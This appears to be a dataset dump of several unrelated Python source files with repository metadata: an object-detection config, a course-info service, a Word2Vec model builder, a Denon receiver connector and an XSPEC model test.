most_important_feature = feature_importance.index(max(feature_importance))
least_important_feature = feature_importance.index(min(feature_importance))
# Print both
print('Most important feature:', columns[most_important_feature])
print('Least important feature:', columns[least_important_feature])
print(feature_importance)
for i in range(0, len(feature_importance)):
print(columns[feature_importance.index(feature_importance[i])])
print(y_predicted)
print(y_test)
le = LabelEncoder()
le.fit([dataset[j][-1] for j in range(0, len(dataset))])
list(le.classes_)
y_predicted = le.transform(y_predicted)
y_test = le.transform(y_test)
print(y_predicted)
print(y_test)
|
[
"zelenkastiot@gmail.com"
] |
zelenkastiot@gmail.com
|
2ebbafa1c2d6e457a74cceb59b8ab893eab097ca
|
c5f58af61e3577ded52acda210f4f664651b598c
|
/template/mmdetection/configs/fpg/retinanet_r50_fpg_crop640_50e_coco.py
|
6c517c9bfc6efebd56f35173b33505ea42865e03
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
hojihun5516/object-detection-level2-cv-02
|
0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac
|
bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109
|
refs/heads/master
| 2023-08-31T09:50:59.150971
| 2021-10-16T15:00:19
| 2021-10-16T15:00:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,470
|
py
|
_base_ = "../nas_fpn/retinanet_r50_nasfpn_crop640_50e_coco.py"
norm_cfg = dict(type="BN", requires_grad=True)
model = dict(
neck=dict(
_delete_=True,
type="FPG",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
inter_channels=256,
num_outs=5,
add_extra_convs=True,
start_level=1,
stack_times=9,
paths=["bu"] * 9,
same_down_trans=None,
same_up_trans=dict(
type="conv",
kernel_size=3,
stride=2,
padding=1,
norm_cfg=norm_cfg,
inplace=False,
order=("act", "conv", "norm"),
),
across_lateral_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
across_down_trans=dict(
type="interpolation_conv",
mode="nearest",
kernel_size=3,
norm_cfg=norm_cfg,
order=("act", "conv", "norm"),
inplace=False,
),
across_up_trans=None,
across_skip_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
output_trans=dict(type="last_conv", kernel_size=3, order=("act", "conv", "norm"), inplace=False),
norm_cfg=norm_cfg,
skip_inds=[(0, 1, 2, 3), (0, 1, 2), (0, 1), (0,), ()],
)
)
evaluation = dict(interval=2)
|
[
"hojihun5516@daum.net"
] |
hojihun5516@daum.net
|
c89927df7078e8bf390e1f73ca56617223ac32d4
|
cef4f2e3357577bf56d3181dba988d0006d796b9
|
/Projects/CourseInfo/Services/BussinessLogicServices/CourseService-old.py
|
3ecae3d629720953d59c8dacbef0d7c8def24fd4
|
[] |
no_license
|
IshaShah27/E6156F21
|
5256715399f58d5f03dc6b4b8cf8e3920eb55bc7
|
8769203cf61a5ca96d5baa5ad1be34b1031ffffe
|
refs/heads/main
| 2023-08-26T22:07:13.469515
| 2021-10-18T21:31:01
| 2021-10-18T21:31:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,613
|
py
|
import Services.DataAccessServices.CourseWorksAdapter as cw_adapter
class Student():
def __init__(self, context, j_data):
self._context = context
self.id = j_data["id"]
self.user_id = j_data["sis_user_id"]
self.login_id = j_data["login_id"]
name_fields = j_data["sortable_name"].split(",")
self.name = {
"last_name": name_fields[0],
"first_name": name_fields[1]
}
def to_json(self):
result = {}
result["id"] = self.id
result["name"] = self.name
result["user_id"] = self.user_id
result["login_id"] = self.login_id
return result
class Course():
_field_list = ["id", "name", "uuid", "course_code_full", "course_no", "section", "year", "semester"]
def __init__(self, context, j_data):
self._context = context
self.id = j_data["id"]
self.name = j_data["name"]
self.uuid = j_data["uuid"]
self.course_code_full = j_data["course_code"]
course_code_fields = self.course_code_full.split("_")
self.course_no = course_code_fields[0]
self.section = course_code_fields[1]
self.year = course_code_fields[2]
self.semester = course_code_fields[3][0]
def to_json(self):
result = {}
for f in Course._field_list:
result[f] = getattr(self, f)
return result
@classmethod
def set_context(cls, context):
cls._context = context
@classmethod
def get_courses(cls, role=None):
res = cw_adapter.Adapter.set_context(cls._context)
res = cw_adapter.Adapter.get_courses(role=role)
if res is not None and len(res) > 0:
result = []
for j_data in res:
result.append(Course(cls._context, j_data))
else:
result = None
return result
@classmethod
def get_course(cls, course_id):
res = cw_adapter.Adapter.set_context(cls._context)
res = cw_adapter.Adapter.get_courses(course_id=course_id)
if res is not None and len(res) > 0:
res_in = res[0]
result = Course(cls._context, res_in)
else:
result = None
return result
def get_students(self):
res = cw_adapter.Adapter.set_context(self._context)
res = cw_adapter.Adapter.get_students(self.id)
if res[0] == 200:
result = []
for j_data in res[1]:
result.append(Student(self._context, j_data))
else:
result = None
return result
|
[
"donff2@aol.com"
] |
donff2@aol.com
|
8c626ab93dbf410bba8151b8cdd660481d96c411
|
a2c575fe2cf4afa40ec2adb8d5b98ec47693665b
|
/thread_api/model_builder.py
|
1408f69c6ff601cbc6c4b8fa998e7f5224c3adaf
|
[] |
no_license
|
cosmicBboy/confesh-bots
|
b530ba866fee5d276a8428670f2b2fb3a3f1ca3b
|
e1115a7c3f3cfb13d5b2e185c0b9410ccc09f5e4
|
refs/heads/master
| 2021-03-19T08:28:25.579876
| 2018-04-12T20:13:05
| 2018-04-12T20:13:05
| 44,482,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,796
|
py
|
'''Module for Building a Model
Train a Word2Vec Model based on secret and comment text on www.confesh.com
1. Read secret and comment text
2. Train a Word2Vec model
3. Serialize model to S3
'''
import logging
import pandas as pd
import mongo_creds as creds
import json
import sys
import smart_open as so
from collections import OrderedDict
from argparse import ArgumentParser
from gensim.models import Word2Vec
from stream_mongo import MongoStreamer
from preprocessor import TextPreprocessor
from s3_utils import create_model_key
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
tp = TextPreprocessor()
class Word2VecModelBuilder(object):
def __init__(self, params):
self.model = Word2Vec
self.params = params
def fit(self, train_docs):
token_list = [tp.preprocess(d['text']) for d in train_docs]
self.model = self.model(token_list, **self.params)
def save_model(self, model_name, document_ids):
s3_keys = self._get_s3_keys(model_name)
self.model.save(s3_keys['model'])
with so.smart_open(s3_keys['params'], 'wb') as fout:
fout.write(json.dumps(self.params, sort_keys=True))
with so.smart_open(s3_keys['doc_ids'], 'wb') as fout:
for i in document_ids:
fout.write(i + '\n')
def load_model(self, model_name):
s3_keys = self._get_s3_keys(model_name)
self.model = self.model.load(s3_keys['model'])
def _get_s3_keys(self, model_name):
return {
'model': create_model_key(model_name, 'model', 'w2v'),
'params': create_model_key(model_name, 'params', 'json'),
'doc_ids': create_model_key(model_name, 'doc_ids', 'txt')
}
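# A minimal sketch of the flow described in the module docstring (assumed example data, not
# from the original module): fit() expects documents with a 'text' field; the '_id' values
# and the Word2Vec parameters below are illustrative, and the parameter names follow
# gensim 3.x ('size' became 'vector_size' in gensim 4+). save_model() is left commented out
# because it writes the artifacts to S3 via create_model_key.
if __name__ == '__main__':
    demo_docs = [
        {'_id': 'doc1', 'text': 'first confession text goes here'},
        {'_id': 'doc2', 'text': 'second confession text goes here'},
    ]
    demo_builder = Word2VecModelBuilder({'size': 50, 'window': 5, 'min_count': 1})
    demo_builder.fit(demo_docs)
    # demo_builder.save_model('demo_w2v_model', [d['_id'] for d in demo_docs])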
|
[
"niels.bantilan@gmail.com"
] |
niels.bantilan@gmail.com
|
1a95ee42312d01afa32e915af2536f8f124984c7
|
2c74bb301f1ed83b79254944183ac5a18a639fdf
|
/homeassistant/components/denonavr/receiver.py
|
28969d2579256202064fcda1e7a514fa6498a181
|
[
"Apache-2.0"
] |
permissive
|
Adminiuga/home-assistant
|
5bec93007ddac1a268cc359bf7e48530c5f73b38
|
dcf68d768e4f628d038f1fdd6e40bad713fbc222
|
refs/heads/dev
| 2023-02-22T22:03:31.013931
| 2022-11-09T00:27:20
| 2022-11-09T00:27:20
| 123,929,062
| 5
| 4
|
Apache-2.0
| 2023-02-22T06:14:31
| 2018-03-05T14:11:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,668
|
py
|
"""Code to handle a DenonAVR receiver."""
from __future__ import annotations
from collections.abc import Callable
import logging
from denonavr import DenonAVR
_LOGGER = logging.getLogger(__name__)
class ConnectDenonAVR:
"""Class to async connect to a DenonAVR receiver."""
def __init__(
self,
host: str,
timeout: float,
show_all_inputs: bool,
zone2: bool,
zone3: bool,
async_client_getter: Callable,
) -> None:
"""Initialize the class."""
self._async_client_getter = async_client_getter
self._receiver: DenonAVR | None = None
self._host = host
self._show_all_inputs = show_all_inputs
self._timeout = timeout
self._zones: dict[str, str | None] = {}
if zone2:
self._zones["Zone2"] = None
if zone3:
self._zones["Zone3"] = None
@property
def receiver(self) -> DenonAVR | None:
"""Return the class containing all connections to the receiver."""
return self._receiver
async def async_connect_receiver(self) -> bool:
"""Connect to the DenonAVR receiver."""
await self.async_init_receiver_class()
assert self._receiver
if (
self._receiver.manufacturer is None
or self._receiver.name is None
or self._receiver.model_name is None
or self._receiver.receiver_type is None
):
_LOGGER.error(
"Missing receiver information: manufacturer '%s', name '%s', model '%s', type '%s'",
self._receiver.manufacturer,
self._receiver.name,
self._receiver.model_name,
self._receiver.receiver_type,
)
return False
_LOGGER.debug(
"%s receiver %s at host %s connected, model %s, serial %s, type %s",
self._receiver.manufacturer,
self._receiver.name,
self._receiver.host,
self._receiver.model_name,
self._receiver.serial_number,
self._receiver.receiver_type,
)
return True
async def async_init_receiver_class(self) -> None:
"""Initialize the DenonAVR class asynchronously."""
receiver = DenonAVR(
host=self._host,
show_all_inputs=self._show_all_inputs,
timeout=self._timeout,
add_zones=self._zones,
)
# Use httpx.AsyncClient getter provided by Home Assistant
receiver.set_async_client_getter(self._async_client_getter)
await receiver.async_setup()
self._receiver = receiver
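# A minimal sketch of driving this helper outside Home Assistant (the host address and the
# httpx-based client factory are illustrative assumptions; any zero-argument callable
# returning an httpx.AsyncClient can serve as async_client_getter):
#
#     import asyncio
#     import httpx
#
#     async def _demo() -> None:
#         connect = ConnectDenonAVR(
#             host="192.168.1.50",
#             timeout=5.0,
#             show_all_inputs=False,
#             zone2=False,
#             zone3=False,
#             async_client_getter=lambda: httpx.AsyncClient(),
#         )
#         if await connect.async_connect_receiver():
#             print(connect.receiver.name)
#
#     asyncio.run(_demo())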
|
[
"noreply@github.com"
] |
Adminiuga.noreply@github.com
|
8bfbca51d0b37ee289502c1fbaaf5efe3b2fda3e
|
debffca14a39dbeaf6af2f1b73ea530913e2cdad
|
/astromodels/tests/test_load_xspec_models.py
|
e10e14154daf319d6f29bd8409ebbdc01001fd9b
|
[
"BSD-3-Clause"
] |
permissive
|
BjoernBiltzinger/astromodels
|
6986695abfc4510a62254854fd0977b1e96e192f
|
d94a3d3bc607def2b5e3cd145c3922e0a00a7b15
|
refs/heads/master
| 2022-11-03T19:28:16.949036
| 2019-03-12T17:05:59
| 2019-03-12T17:05:59
| 175,420,543
| 0
| 0
|
BSD-3-Clause
| 2019-03-13T12:53:03
| 2019-03-13T12:53:03
| null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
import pytest
import astropy.units as u
try:
from astromodels.xspec import *
except:
has_XSPEC = False
else:
has_XSPEC = True
# This defines a decorator which can be applied to single tests to
# skip them if the condition is not met
skip_if_xspec_is_not_available = pytest.mark.skipif(not has_XSPEC,
reason="XSPEC not available")
@skip_if_xspec_is_not_available
def test_xspec_load():
# no need to do anything really
s = XS_phabs() * XS_powerlaw() + XS_bbody()
print(s(1.0))
s.set_units(u.keV, 1 / (u.keV * u.cm**2 * u.s))
print(s(1.0 * u.keV))
|
[
"giacomo.vianello@gmail.com"
] |
giacomo.vianello@gmail.com
|